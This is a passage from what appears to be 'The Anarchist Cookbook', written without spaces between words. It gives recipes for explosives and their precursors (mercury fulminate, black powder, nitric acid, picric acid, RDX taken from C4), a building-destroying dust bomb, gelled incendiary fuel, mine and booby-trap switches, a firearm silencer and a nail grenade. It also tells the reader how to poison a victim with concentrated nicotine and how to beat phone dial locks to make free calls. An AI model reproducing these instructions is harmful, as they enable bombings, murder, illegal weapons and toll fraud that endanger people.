sticktothesideofthecontainer.Ifso,tiltandsquirtwaterdownthesides ofthecontaineruntilallofthematerialcollectsonthefilterpaper. 6. Washthecrystalswith6teaspoonsofethylalcohol. 7. Allowthesemercuryfulminatecrystalstoairdry. CAUTION:Handledryexplosivewithgreatcare.Donotscrapeorhandleit roughly!Keepawayfromsparksoropenflames.Storeinacool,dryplace. 132.ImprovisedBlackPowderbyTheJollyRoger Blackpowdercanbepreparedinasimple,safemanner.Itmaybeusedas blastingorgunpowder. Materials: PotassiumNitrate,granulated,3cups(3/4liter) Woodcharcoal,powdered,2cups Sulfur,powdered,cup Alcohol,5pints(2liters)(whiskey,rubbingalcohol,etc.) Water,3cups(3/4liter) Heatsource 2bucketseach2gallon(7liters)capacity,atleastoneofwhichis heatresistant(metal,ceramic,etc.) Flatwindowscreening,atleast1foot(30cm)square Largewoodenstick Cloth,atleast2feet(60cm)square Procedure: 1. Placealcoholinoneofthebuckets. 2. Placepotassiumnitrate,charcoal,andsulfurintheheatresistant bucket.Add1cupwaterandmixthoroughlywithwoodenstickuntilall ingredientsaredissolved. 3. Addremainingwater(2cups)tomixture.Placebucketonheatsourceand stiruntilsmallbubblesbegintoform. CAUTION:DONOTboilmixture.BesureALLmixturestayswet.Ifanyis

dry,asonsidesofpan,itmayignite! 4. Removebucketfromheatandpourmixtureintoalcoholwhilestirring vigorously. 5. Letalcoholmixturestandabout5minutes.Strainmixturethroughclothto obtainblackpowder.Discardliquid.Wrapclotharoundblackpowderandsqueeze toremoveallexcessliquid. 6. Placescreeningoverdrybucket.Placeworkableamountofdamppowderon screenandgranulatebyrubbingsolidthroughscreen.NOTE:Ifgranulated particlesappeartosticktogetherandchangeshape,recombineentirebatchof powderandrepeatsteps5&6. 7. Spreadgranulatedblackpowderonflat,drysurfacesothatlayerabout inch(1cm)isformed.Allowtodry.Useradiator,ordirectsunlight.This shouldbedriedassoonaspossible,preferablyinanhour.Thelongerthe dryingperiod,thelesseffectivetheblackpowder. CAUTION:RemovefromheatASSOONASgranulesaredry.Blackpowderisnow readytouse. 133.NitricAcidbyTheJollyRoger NitricAcidisusedinthepreparationofmanyexplosives,incendiarymixtures, andaciddelaytimers.Itmaybepreparedbydistillingamixtureofpotassium nitrateandconcentratedsulfuricacid. MaterialRequired: PotassiumNitrate(2partsbyvolume) CONCENTRATEDsulfuricacid(1partbyvolume) 2bottlesorceraminjugs(narrownecksarepreferable) Potorfryingpan Heatsource(wood,charcoal,orcoal) Tape(paper,electrical,masking,butNOTcellophane!) Paperorrags IMPORTANT:Ifsulfuricacidisobtainedfromamotorvehiclebattery, concentrateitbyboilingitUNTILwhitefumesappear.DONOTINHALEFUMES. NOTE:Theamountofnitricacidproducedisthesameastheamountofpotassium nitrate.Thus,fortwotablespoonsofnitricacid,use2tablespoonsof potassiumnitrateand1tablespoonfulofconcentratedsulfuricacid. SourceofPotassiumNitrate: ElsewhereinthisCookbook Drugstores SourceofCONCENTRATEDsulfuricacid: Motorvehiclebatteries Industrialplants Procedure: 1. Placedrypotassiumnitrateinbottleorjug.Addsulfuricacid.Donot fillthebottlemorethanfull.Mixuntilpasteisformed. CAUTION:DONOTINHALEFUMES!

2. Wrappaperorragsaroundnecksoftwobottles.securelytapenecksoftwo bottlestogether.Besurethatbottlesareflushagainsteachotherandthat therearenoairspaces. 3. SupportbottlesonrocksorcanssothatemptybottleisSLIGHTLYlower thanbottlecontainingpastesothatnitricacidthatisformedinreceiving bottlewillnotrunintootherbottle. 4. Buildfireinpotorfryingpan.

5. Gentlyheatbottlecontainingmixturebygentlymovingfireinandout.As redfumesbegintoappearperiodicallypourcoolwateroveremptyreceiving bottle.Nitricacidwillbegintoforminreceivingbottle. CAUTION:Donotoverheatorwetbottlecontainingmixtureoritmay shatter.Asanaddedprecaution,placebottletobeheatedinheatresistant containerfilledwithsandorgravel.Heatthisoutercontainertoproduce nitricacid. 6. Continuetheaboveprocessuntilnomoreredfumesareformed.Ifthe nitricacidformedinthereceivingbottleisnotclear(cloudy)pouritinto cleanedbottleandrepeatsteps26. CAUTION:Nitricacidshouldbekeptawayfromallcombustiblesandshould bekeptinaSEALEDCERAMICORGLASScontainer.DONOTinhalefumes! 134.DustBombInstructionsbyTheJollyRoger Aninitiatorwhichwillinitiatecommonmaterialtoproducedustexplosionscan berapidlyandeasilyconstructed.Thistypeofchargeisidealforthe destructionofenclosedareassuchasroomsorbuildings. MaterialRequired: Aflatcan,3in.(8cm)indiameterand1in.(33/4cm)high.A6 ouncetunacanservesthepurposequitewell. Blastingcap Explosive Aluminum(maybewire,cutsheet,flattenedcan,orpowder) Largenail,4in.(10cm)long Woodenrodin.(6mm)diameter Flour,gasoline,andpowderorchippedaluminum NOTE:Plasticexplosiveproducebetterexplosionsthancastexplosives. Procedure: 1. Usingthenail,pressaholethroughthesideofthetunacan3/8inchto inch(1to1cm)fromthebottom.Usingarotatingandleveraction,enlarge theholeuntilitwillaccommodatetheblastingcap. 2. Placethewoodenrodintheholeandpositiontheendoftherodatthe centerofthecan. 3. Pressexplosiveintothecan,beingsuretosurroundtherod,untilitis 3/4inch(2cm)fromthetopofthecan.Carefullyremovethewoodenrod. 4. Placethealuminummetalontopoftheexplosive. 5. Justbeforeuse,inserttheblastingcapintothecavitymadebytherod. Theinitiatorisnowreadytouse. NOTE:Ifitisdesiredtocarrytheinitiatorsomedistance,cardboardmay bepressedontopofthealuminumtoinsureagainstlossofmaterial. HowtoUse: Thisparticularunitworksquitewelltoinitiatechargesoffivepoundsof flour,gallon(12/3liters)ofgasoline,ortwopoundsofflakepainters aluminum.Thesolidmaterialsmaymerelybecontainedinsacksorcardboard cartons.Thegasolinemaybeplacedinplasticcoatedpapermilkcartons,as wellasplasticorglassbottles.Thechargesareplaceddirectlyontopofthe initiatorandtheblastingcapisactuatedelectricallyorbyafusedepending onthetypeofcapemployed.thiswilldestroya2,000cubicfeetenclosure (building10x20x10feet). Note:Forlargerenclosures,useproportionallylargerinitiatorsandcharges.

135.CarbonTetExplosivebyTheJollyRoger Amoistexplosivemixturecanbemadefromfinealuminumpowdercombinedwith carbontetrachlorideortetrachloroethylene.Thisexplosivecanbedetonated withablastingcap. MaterialRequired: Finealuminumbronzingpowder CarbonTetrachlorideorTetrachloroethylene Stirringrod(wood) Mixingcontainer(bowl,bucket,etc.) Measuringcontainer(cup,tablespoon,etc.) Storagecontainer(jar,can,etc.) Blastingcap Pipe,canorjar SourceofCarbonTetrachloride: Paintstore Pharmacy Fireextinguisherfluid SourceofTetrachloroethylene: Drycleaners Pharmacy Procedure: 1. Measureouttwopartsaluminumpowdertoonepartcarbontetrachlorideor tetrachlorethyleneliquidintomixingcontainer,addingliquidtopowderwhile stirringwiththewoodenrod. 2. Stiruntilthemixturebecomestheconsistencyofhoneysyrup. CAUTION:Fumesfromtheliquidaredangerousandshouldnotbeinhaled.

3. Storeexplosiveinajarorsimilarwaterproofcontaineruntilreadyto use.Theliquidinthemixtureevaporatesquicklywhennotconfined. NOTE:Mixturewilldetonateinthismannerforaperiodof72hours. HowtoUse: 1. Pourthismixtureintoanironorsteelpipewhichhasanendcapthreaded ononeend.Ifapipeisnotavailable,youmayuseadrytincanorglassjar. 2. Insertblastingcapjustbeneaththesurfaceoftheexplosivemix. NOTE:Confiningtheopenendofthecontainerwilladdtotheeffectivenessof theexplosive. 136.MakingPicricAcidfromAspirinbyTheJollyRoger PicricAcidcanbeusedasaboosterexplosiveindetonators,ahigh explosivecharge,orasanintermediatetopreparingleadpicric. MaterialRequired: Aspirintablets(5grainspertablet) Alcohol,95%pure Sulfuricacid,concentrated,(ifbatteryacid,boiluntilwhitefumes disappear) PotassiumNitrate(seeelsewhereinthisCookbook) Water Papertowels Canningjar,1pint

Rod(glassorwood) Glasscontainers Ceramicorglassdish Cup Teaspoon Tablespoon Pan Heatsource Tape

Procedure: 1. Crush20aspirintabletsinaglasscontainer.Add1teaspoonofwaterand workintoapaste. 2. Addapproximately1/3tocupofalcohol(100milliliters)totheaspirin paste;stirwhilepouring. 3. Filterthealcoholaspirinsolutionthroughapapertowelintoanother glasscontainer.Discardthesolidleftinthepapertowel. 4. Pourthefilteredsolutionintoaglassorceramicdish. 5. Evaporatethealcoholandwaterfromthesolutionbyplacingthedishinto apanofhotwater.Whitepowderwillremaininthedishafterevaporation. NOTE:Thewaterinthepanshouldbeathotbathtemperature,notboiling, approx160Fto180F.Itshouldnotburnthehands. 6. Pour1/3cup(80milliliters)ofconcentratedsulfuricacidintoacanning jar.Addthewhitepowdertothesulfuricacid. 7. Heatcanningjarofsulfuricacidinapanofsimmeringhotwaterbathfor 15minutes;thenremovejarfromthebath.Solutionwillturntoayelloworange color. 8. Add3levelteaspoons(15grams)ofpotassiumnitrateinthreeportionsto theyelloworangesolution;stirvigorouslyduringadditions.Solutionwillturn red,thenbacktoayelloworangecolor. 9. Allowthesolutiontocooltoambientroomtemperaturewhilestirring occasionally. 10. Slowlypourthesolution,whilestirring,into1cup(300milliliters) ofcoldwaterandallowtocool. 11. Filterthesolutionthroughapapertowelintoaglasscontainer.Light yellowparticleswillcollectonthepapertowel. 12. Washthelightyellowparticleswith2tablespoons(25milliliters)of water.Discardthewasteliquidinthecontainer. 13. Placearticlesinceramicdishandsetinahotwaterbath,asinstep5, for2hours. 137.ReclamationofRDXfromC4ExplosivesbytheJollyRoger RDXcanbeobtainedfromC4explosiveswiththeuseofgasoline.Itcanbeused asaboosterexplosivefordetonatorsorasahighexplosivecharge. MaterialRequired: Gasoline C4explosive 2pintglassjars,widemouth Papertowels Stirringrod(glassorwood) Water Ceramicorglassdish Pan Heatsource Teaspoon Cup Tape

NOTE:Water,Ceramicorglassdish,pan,&heatsourcearealloptional.TheRDX canbeairdriedinstead. Procedure: 1. Place1teaspoons(15grams)ofC4explosiveinoneofthepintjars. Add1cup(240milliliters)ofgasoline. NOTE:ThesequantitiescanbeincreasedtoobtainmoreRDX.Forexample, use2gallonsofgasolineper1cupofC4. 2. KneadandstirtheC4withtheroduntiltheC4hasbrokendowninto smallparticles.Allowmixturetostandforhour. 3. Stirthemixtureagainuntilafinewhitepowderremainsonthebottomof thejar. 4. Filterthemixturethroughapapertowelintotheotherglassjar.Wash theparticlescollectedonthepapertowelwithcup(120milliliters)of gasoline.Discardthewasteliquid. 5. PlacetheRDXparticlesinaglassorceramicdish.Setthedishinapan ofhotwater,notboilinganddryforaperiodof1hour. NOTE:TheRDXparticlesmaybeairdriedforaperiodof2to3hours.

138.EggbasedGelledFlameFuelsbyTheJollyRoger Thewhiteofanybirdeggcanbeusedtogelgasolineforuseasaflamefuel whichwilladheretotargetsurfaces. MaterialsRequired: PartsbyVolume Ingredient Howused CommonSource 85 Gasoline MotorFuel GasStations StoveFuel MotorVehicle Solvent 14 EggWhites Food Industrial Processes FoodStore Farms

Anyoneofthefollowing: 1 3 3 3 2 1 TableSalt Food Industrial Processes SeaWater NaturalBrine FoodStore CoffeePlant TeaPlant

GroundCoffee Food FoodStore DriedTeaLeaves Food FoodStore Cocoa Food CacaoTree FoodStore

Sugar Sweetening SugarCane Foods FoodStore Saltpeter Pyrotechnics Natural (PotassiumNitrate) Explosives Deposits Matches DrugStore Medicine

1 2 1 1

EpsomSalts Medicine Natural MineralWater Kisserite Industrial DrugStore Processes FoodStore WashingSoda WashingCleaner (SalSoda) Medicine DrugStore Photography PhotoSupply Store BakingSoda Baking FoodStore Beverages DrugStore Medicines MineralWaters Aspirin Medicine FoodStore DrugStore FoodStore

Procedure: CAUTION:Makesurethattherearenoopenflamesintheareawhenmixingflame fuels!NOSMOKING!! 1. Separatetheeggwhitefromtheyolk.Thiscanbedonebybreakingtheegg intoadishandcarefullyremovingtheyolkwithaspoon. 2. Poureggwhiteintoajar,bottle,orothercontainer,andaddgasoline. 3. Addthesalt(orotheradditive)tothemixtureandstiroccasionally untilgelforms(about5to10minutes). NOTE:Athickergelledflamefuelcanbeobtainedbyputtingthecappedjarin hot(65C)waterforabouthourandthenlettingthemcooltoroom temperature.(DONOTHEATTHEGELLEDFUELCONTAININGCOFFEE!!) 139.ClothespinSwitchbyTheJollyRoger Aspringtypeclothespinisusedtomakeacircuitclosingswitchtoactuate explosivecharges,mines,boobytraps,andalarmsystems. MaterialRequired: Springtypeclothespin Soldcopperwire1/16in.(2mm)indiameter Strongstringonwire Flatpieceofwood(roughly1/8x1"x2") Knife Procedure: 1. Stripfourin.(10cm)ofinsulationfromtheendsof2solidcopper wires.Scrapethecopperwireswithpocketknifeuntilthemetalisshiny. 2. Windonescrapedwiretightlyonjawoftheclothespin,andtheotherwire ontheotherjaw. 3. Makeaholeinoneendoftheflatpieceofwoodusingaknife,heated nailordrill. 4. Tiestrongstringorwirethroughthehole. 5. Placeflatpieceofwoodbetweenthejawsoftheclothespinswitch. BasicFiringCircuit: ______________ ||\ |initiator|\|strong ||twine ||\

|__________ | ||\clothespin \/ \/switch \/ \/ \/ + || |battery| Whentheflatpieceofwoodisremovedbypullingthestring,thejawsofthe clothespinwillclose,completingthecircuit. CAUTION:Donotattachthebatteryuntiltheswitchandtripwirehavebeen emplacedandexamined.Besurethattheflatpieceofwoodisseparatingthe jawsoftheswitch. 140.FlexiblePlateSwitchbyTheJollyRoger Thisflexibleplateswitchisusedforinitiatingemplacedminesandexplosives. MaterialRequired: Twoflexiblemetalsheets: Oneapproximately10in.(25cm)square Oneapproximately10in.x8in.(20cm) Pieceofwood10in.squarex1in.thick Foursoftwoodblocks1in.x1in.xin. Eightflatheadnails,1in.long Connectingwires Adhesivetape Procedure: 1. Nail10in.by8in.metalsheetto10in.squarepieceofwoodsothat1 in.ofwoodshowsoneachsideofthemetal.Leaveoneofthenailsstickingup aboutin. 2. Stripinsulationfromtheendofoneconnectingwire.Wrapthisendaround thenailanddrivethenailallthewayin. 3. Placethefourwoodblocksonthecornersofthewoodbase. 4. Placethe10in.squareflexiblemetalsheetsothatitrestsonthe blocksinlinewiththewoodbase. 5. Drivefournailsthroughthemetalsheetandtheblocks(1perblock)to fastenthesheettothewoodbase.Asecondconnectingwireisattachedtoone ofthenailsasinstep#2. 6. Wraptheadhesivetapearoundtheedgesoftheplateandwoodbase.This willassurethatnodirtorotherforeignmatterwillgetbetweentheplatesand preventtheswitchfromoperating. Howtouse: Theswitchisplacedinaholeinthepathofexpectedtrafficandcoveredwith athinlayerofdirtorothercamouflagingmaterial.Themineorotherexplosive deviceconnectedtotheswitchcanbeburiedwiththeswitchoremplaced elsewhereasdesired. Whenavehiclepassesovertheswitch,thetwometalplatesmakecontactclosing thefiringcircuit.

141.LowSignatureSystems(Silencers)byTheJollyRoger Lowsignaturesystems(silencers)forimprovisedsmallarmsweaponscanbe madefromsteelgasorwaterpipeandfittings. MaterialRequired: GrenadeContainer Steelpipenipple,6in.(15cm)long(seetable1fordiameter) 2steelpipecouplings(seetable2fordimensions) Cottoncloth(seetable2) Drill Absorbentcotton Procedure: 1. Drillholeingrenadecontaineratbothendstofitoutsidediameterof pipenipple.(seetable1) >/\ /|| 2.75in|)(<holes dia.\|| >\/ || 5in. 2. Drillfourrowsofholesinpipenipple.Usetable1fordiameterand locationofholes. (Note:IsuckatASCIIart!) 6in. || ________________________________________ |OOOOOOOOOOOOOOOOO||C(nom.dia.) (sizeofhole)|\/(spacebetween) B(dia.)A 3. Threadoneofthepipecouplingsonthedrilledpipenipple. 4. Cutcouplinglengthtoallowbarrelofweapontothreadfullyintolow signaturesystem.Barrelshouldbuttagainstendofthedrilledpipenipple. 5. Separatethetophalfofthegrenadecontainerfromthebottomhalf. 6. Insertthepipenippleinthedrilledholeatthebaseofthebottomhalf ofthecontainer.Packtheabsorbentcottoninsidethecontainerandaroundthe pipenipple. 7. Packtheabsorbentcottonintophalfofgrenadecontainerleavingholein center.Assemblecontainertothebottomhalf. 8. Threadtheothercouplingontothepipenipple. Note:Alongercontainerandpipenipple,withsame"A"and"B"dimensionsas thosegiven,willfurtherreducethesignatureofthesystem. Howtouse: 1. Threadthelowsignaturesystemontheselectedweaponsecurely. 2. Placethepropercottonwadsizeintothemuzzleendofthesystem(see table2) 3. Loadweapon 4. Weaponisnowreadyforuse TABLE1 LowSignatureSystemDimensions

Coupling Holesper 4rows A B C D Row Total .45cal 3/8in in 3/8in 3/8in 12 48 .38cal 3/8in in in in 12 48 9mm 3/8in in in in 12 48 7.62mm 3/8in in in in 12 48 .22cal in 5/32in 1/8*in 1/8in 14 50 *ExtraHeavyPipe TABLE2 CottonWaddingSizes Weapon CottonWaddingSize .45cal 1x6inches .38cal 1x4inches 9mm 1x4inches 7.62mm 1x4inches .22cal Notneeded 142.DelayIgniterfromaCigarettebyTheJollyRoger Asimpleandeconomical(everyonewantstosavemoneyhaha)timedelaycan bemadewithacommoncigarette. MaterialsRequired: Cigarette Papermatch String(shoelaceorsimilarcord) Fusecord(improvisedorcommercial) Procedure: 1. Cutendoffusecordataslanttoexposeinnercore 2. Lightcigaretteinnormalfashion.Placeapapermatchsothatthehadis overexposedendoffusecordandtiebothtothesideoftheburningcigarette withstring. 3. Positiontheburningcigarettewithfusesothatitburnsfreely.A suggestedmethodistohangthedelayonatwig. Note:Commondrycigarettesburnabout1inchevery7or8minutesinstillair. (NowIamtalkingaboutallexceptAmericanbrands,whichburnabout1inch every45minutes)Ifthefusecordisplaceoneinchfromtheburningendof thecigaretteatimedelayof7or8minuteswillresult. Delaytimewillvarydependingupontypeofcigarette,wind,moisture,andother atmosphericconditions(gettoknowyourcigarette!)Toobtainaccuratedelay time,atestrunshouldbemadeunder"use"conditions. 143.NicotinebyTheJollyRoger Nicotineisanabundantpoison.Easilyfoundintobaccoproducts,in concentratedformafewdropscanquicklykillsomeone.Hereishowto concentrateit: Firstgetacanofchewingtobaccoorpipetobacco.Removethecontentsandsoak inwaterovernightinajar(about2/3cupofwaterwilldo...).Inthemorning, strainintoanotherjarthemixturethroughaporoustowel.Thenwrapthetowel aroundtheballoftobaccoandsqueezeituntilalloftheliquidisinthejar. Throwawaythetobaccoyouwillnotneeditanymore. Nowyouhavetwooptions.Irecommendthefirst.Itmakesthenicotinemore

potent. 1. Allowtoevaporateuntilastickysyrupresultsinthejar.Thisisalmost purenicotine(hell,itispureenoughforsure!). 2. Heatoverlowflameuntilwaterisevaporatedandathickstickysyrup results(Idon'tknowhowlongittakes...shouldn'ttaketoolong,though.). Nowallyouhavetodo,whenyouwishtouseit,istoputafewdropsina medicinedropperorequivalent,andslipabout4or5dropsintothevictim's coffee.Coffeeisrecommendedsinceitwilldisguisethetaste.Sincenicotine isadrug,thevictimshouldgetquiteabuzzbeforetheyturntheirtoesupto thedaisies,sotospeak. Note:Ifthesyrupistoosticky,diluteitwithafewdropsofwater.Andwhile youareatit,betteraddanextradroptothecoffeejusttobesure! 144.DriedSeedTimerbyTheJollyRoger Atimedelaydeviceforelectricalfiringcircuitscanbemadeusingthe principleofexpansionofdriedseeds. MaterialRequired: Driedpeas,beans,orotherdehydratedseeds Widemouthglassjarwithnonmetalcap Twoscrewsorbolts Thinmetalplate Handdrill Screwdriver Procedure: 1. Determinetherateoftheriseofthedriedseedsselected.Thisis necessarytodeterminethedelaytimeofthetimer. Placeasampleofthedriedseedsinthejarandcoverwithwater. Measurethetimeittakesfortheseedstoriseagivenheight.Mostdried seedsincrease50%inonetotwohours. 2. Cutadiscfromthinmetalplate.Discshouldfitlooselyinsidethejar. NOTE:Ifmetalispainted,rusty,orotherwisecoated,itmustbescraped orsandedtoobtainacleanmetalsurface 3. Drilltwoholesinthecapofthejarabout2inchesapart.Diameterof holesshouldbesuchthatscrewsorboltswillthreadtightlyintothem.Ifthe jarhasametalcapornocap,apieceofwoodorplastic(NOTMETAL)canbe usedasacover. 4. Turnthetwoscrewsorboltsthroughtheholesinthecap.Boltsshould extendaboutonein.(2cm)intothejar. IMPORTANT:Bothboltsmustextendthesamedistancebelowthecontainer cover. 5. Pourdriedseedsintothecontainer.Thelevelwilldependuponthe previouslymeasuredrisetimeandthedesireddelay. 6. Placethemetaldiscinthejarontopoftheseeds. Howtouse: 1. Addjustenoughwatertocompletelycovertheseedsandplacethecapon thejar. 2. Attachconnectingwiresfromthefiringcircuittothetwoscrewsonthe cap. Expansionoftheseedswillraisethemetaldiscuntilitcontactsthescrews andclosesthecircuit.

145.NailGrenadebyTheJollyRoger EffectivefragmentationgrenadescanbemadefromablockofTNTorother blastingexplosiveandnails. MaterialRequired: BlockofTNTorotherblastingexplosive Nails Nonelectric(militaryorimprovised)blastingcap FuseCord Tape,string,wire,orglue Procedure: 1. IfanexplosivechargeotherthanastandardTNTblockisused,makea holeinthecenterofthechargeforinsertingtheblastingcap.TNTcanbe drilledwithrelativesafety.Withplasticexplosives,aholecanbemadeby pressingaroundstickintothecenterofthecharge.Theholeshouldbedeep enoughthattheblastingcapistotallywithintheexplosive. 2. Tape,tie,orglueoneortworowsofcloselypackednailstothesidesof theexplosiveblock.Nailsshouldcompletelycoverthefoursurfacesofthe block. 3. Placeblastingcapononeendofthefusecordandcrimpwithpliers. NOTE:Tofindouthowlongthefusecordshouldbe,checkthetimeit takesaknownlengthtoburn.If12inches(30cm)burnsfor30seconds,a10 seconddelaywillrequirea4inch(10cm)fuse. 4. Inserttheblastingcapintheholeintheblockofexplosive.Tapeortie fusecordsecurelyinplacesothatitwillnotfalloutwhenthegrenadeis thrown. AlternateUse: Aneffectivedirectionalantipersonnelminecanbemadebyplacingnailson onlyonesideoftheexplosiveblock.Forthecase,andelectricblastingcap canbeused. 146.TheBellGlossarybyTheJollyRoger ACD:AutomaticCallDistributorAsystemthatautomaticallydistributescalls tooperatorpools(providingservicessuchasinterceptanddirectory assistance),toairlineticketagents,etc. Administration:Thetasksofrecordkeeping,monitoring,rearranging,prediction needforgrowth,etc. AIS:AutomaticInterceptSystemAsystememployinganaudioresponseunit undercontrolofaprocessortoautomaticallyprovidepertinentinfotocallers routedtointercept. Alert:Toindicatetheexistenceofanincomingcall,(ringing). ANI:AutomaticNumberIdentificationOftenpronounced"Annie,"afacilityfor automaticallyidentifythenumberofthecallingpartyforchargingpurposes. Appearance:Aconnectionuponanetworkterminal,asin"thelinehastwo networkappearances." Attend:Theoperationofmonitoringalineoranincomingtrunkforoffhookor seizure,respectively.

Audible:Thesubdued"image"ofringingtransmittedtothecallingpartyduring ringing;notderivedfromtheactualringingsignalinlatersystems. BackboneRoute:Theroutemadeupoffinalgrouptrunksbetweenendofficesin differentregionalcenterareas. BHC:BusyHourCallsThenumberofcallsplacedinthebusyhour. Blocking:Theratioofunsuccessfultototalattemptstouseafacility; expressesasaprobabilitywhencomputedapriority. BlockingNetwork:Anetworkthat,undercertainconditions,maybeunableto formatransmissionpathfromoneendofthenetworktotheother.Ingeneral, allnetworksusedwithintheBellSystemsareoftheblockingtype. BlueBox:Equipmentusedfraudulentlytosynthesizesignals,gainingaccessto thetollnetworkfortheplacementofcallswithoutcharge. BORSCHTCircuit:Anameforthelinecircuitinthecentraloffice.Itfunctions asamnemonicforthefunctionsthatmustbeperformedbythecircuit:Battery, Overvoltage,Ringing,Supervision,Coding,Hybrid,andTesting. BusySignal:(Calledlinebusy)Anaudiblesignalwhich,intheBellSystem, comprises480hzand620hzinterruptedat60IPM. Bylink:Aspecialhighspeedmeansusedincrossbarequipmentforroutingcalls incomingfromastepbystepoffice.Trunksfromsuchofficesareoftenreferred toas"bylink"trunksevenwhenincomingtononcrossbaroffices;theyaremore properlyreferredtoas"dcincomingtrunks."Suchhighspeedmeansare necessarytoassurethatthefirstincomingpulseisnotlost. CableVault:ThepointwhichphonecableenterstheCentralOfficebuilding. CAMA:CentralizedAutomaticMessageAccountingPronouncedlikeAlabama. CCIS:CommonChannelInterofficeSignalingSignalinginformationfortrunk connectionsoveraseparate,nonspeechdatalinkratherthatoverthetrunks themselves. CCITT:InternationalTelegraphandTelephoneConsultativeCommitteeAn Internationalcommitteethatformulatesplansandsetsstandardsfor intercountrycommunicationmeans. CDO:CommunityDialOfficeAsmallusuallyruralofficetypicallyservedby stepbystepequipment. CO:CentralOfficeComprisesaswitchingnetworkanditscontrolandsupport equipment.Occasionallyimproperlyusedtomean"officecode." Centrex:AservicecomparableinfeaturestoPBXservicebutimplementedwith some(CentrexCU)orall(CentrexCO)ofthecontrolinthecentraloffice.In thelatercase,eachstation'sloopconnectstothecentraloffice. CustomerLoop:Thewirepairconnectingacustomer'sstationtothecentral office. DDD:DirectDistanceDialingDialingwithoutoperatorassistanceoverthe nationwideintertollnetwork. DirectTrunkGroup:Atrunkgroupthatisadirectconnectionbetweenagiven originatingandagiventerminatingoffice.

EOTT:EndOfficeTollTrunkingTrunkingbetweenendofficesindifferenttoll centerareas. ESB:EmergencyServiceBureauAcentralizedagencytowhich911"universal" emergencycallsarerouted. ESS:ElectronicSwitchingSystemAgenerictermusedtoidentifyasaclass, storedprogramswitchingsystemssuchastheBellSystem'sNo.1No.2,No.3, No.4,orNo. ETS:ElectronicTranslationSystemsAnelectronicreplacementforthecard translatorin4ACrossbarsystems.MakesuseoftheSPC1AProcessor. FalseStart:Anaborteddialingattempt. FastBusy:(oftencalledreorder)Anaudiblebusysignalinterruptedattwice therateofthenormalbusysignal;senttotheoriginatingstationtoindicate thatthecallblockedduetobusyequipment. FinalTrunkGroup:Thetrunkgrouptowhichcallsareroutedwhenavailable highusagetrunksoverflow;thesegroupsgenerally"home"onanofficenext highestinthehierarchy. FullGroup:Atrunkgroupthatdoesnotpermitreroutingoffcontingentforeign traffic;therearesevensuchoffices. Glare:Thesituationthatoccurswhenatwowaytrunkisseizedmoreorless simultaneouslyatbothends. HighUsageTrunkGroup:Theappellationforatrunkgroupthathasalternate routesviaothersimilargroups,andultimatelyviaafinaltrunkgrouptoa higherrankingoffice. Intercept:Theagency(usuallyanoperator)towhichcallsareroutedwhenmade toalinerecentlyremovedfromaservice,orinsomeothercategoryrequiring explanation.Automatedversions(ASI)withautomaticvoiceresponseunitsare growinginuse. Interrupt:Theinterruptiononaphonelinetodisconnectandconnectwith anotherstation,suchasanEmergenceInterrupt. Junctor:Awireorcircuitconnectionbetweennetworksinthesameoffice.The functionalequivalenttoanintraofficetrunk. MF:MultiFrequencyThemethodofsignalingoveratrunkmakinguseofthe simultaneousapplicationoftwooutofsixpossiblefrequencies. NPA:NumberingPlanArea. ONI:OperatorNumberIdentificationTheuseofanoperatorinaCAMAofficeto verballyobtainthecallingnumberofacalloriginatinginanofficenot equippedwithANI. PBX:PrivateBranchExchange(PABX:PrivateAutomaticBranchExchange)An telephoneofficeservingaprivatecustomer,Typically,accesstotheoutside telephonenetworkisprovided. PermanentSignal:Asustainedoffhookconditionwithoutactivity(nodialingor ringingorcompletedconnection);suchaconditiontendstotieupequipment, especiallyinearliersystems.Usuallyaccidental,butsometimesused intentionallybycustomersinhighcrimerateareastothwartoffburglars.

POTS:PlainOldTelephoneServiceBasicservicewithnoextra"frills". ROTL:RemoteOfficeTestLineAmeansforremotelytestingtrunks. RTA:RemoteTrunkArrangementAnextensiontotheTSPSsystempermittingits servicestobeprovidedupto200milesfromtheTSPSsite. SF:SingleFrequency.Asignalingmethodfortrunks:2600hzisimpressedupon idletrunks. Supervise:Tomonitorthestatusofacall. SxS:(StepbySteporStrowgerswitch)Anelectromechanicalofficetype utilizingagrossmotionsteppingswitchasacombinationnetworkand distributedcontrol. Talkoff:Thephenomenonofaccidentalsynthesisofamachineintelligiblesignal byhumanvoicecausinganunintendedresponse."whistlingatone". Trunk:Apathbetweencentraloffices;ingeneral2wireforinterlocal,4wire forintertoll. TSPS:TrafficServicePositionSystemAsystemthatprovides,understored programcontrol,efficientoperatorassistancefortollcalls.Itdoesnot switchthecustomer,butprovidesabridgeconnectiontotheoperator. Xbar:(Crossbar)Anelectromechanicalofficetypeutilizinga"finemotion" coordinateswitchandamultiplicityofcentralcontrols(calledmarkers). Therearefourvarieties: No.1Crossbar:Usedinlargeurbanofficeapplication;(1938) No.3Crossbar:Asmallsystemstartedin(1974). No.4A/4MCrossbar:A4wiretollmachine;(1943). NoCrossbar:Amachineoriginallyintendedforrelativelysmallsuburban applications;(1948) CrossbarTandem:Amachineusedforinterlocalofficeswitching. 147.PhoneDialLocksHowtoBeat'embyTheJollyRoger Haveyoueverbeeninanofficeorsomewhereandwantedtomakeafreephone callbutsomeassholeputalockonthephonetopreventoutgoingcalls?Fret nomorephellowphreak,foreverysystemcanbebeatenwithalittleknowledge! Therearetwowaystobeatthisobstacle,firstpickthelock,Idon'thavethe timetoteachlocksmithingsowegotothesecondmethodwhichtakesadvantage oftelephoneelectronics. Tobeassimpleaspossiblewhenyoupickupthephoneyoucompleteacircuit knownasalocalloop.Whenyouhangupyoubreakthecircuit.Whenyoudial (pulse)italsobreaksthecircuitbutnotlongenoughtohangup!Soyoucan "Pushdial."Todothisyou>>>RAPIDLY<<<depresstheswitchhook.For example,todialanoperator(andthengiveherthenumberyouwanttocall)>>> RAPIDLY<<<&>>>EVENLY<<<depresstheswitchhook10times.Todial6341268, depress6X'Spause,then3X'S,pause,then4X'S,etc.Ittakesalittle practicebutyou'llgetthehangofit.Trypracticingwithyourown#so you'llgetabusytonewhenright.It'llalsoworkontouchtonesinceaDTMF linewillalsoacceptpulse.Also,neverdepresstheswitchhookformorethana secondorit'llhangup!

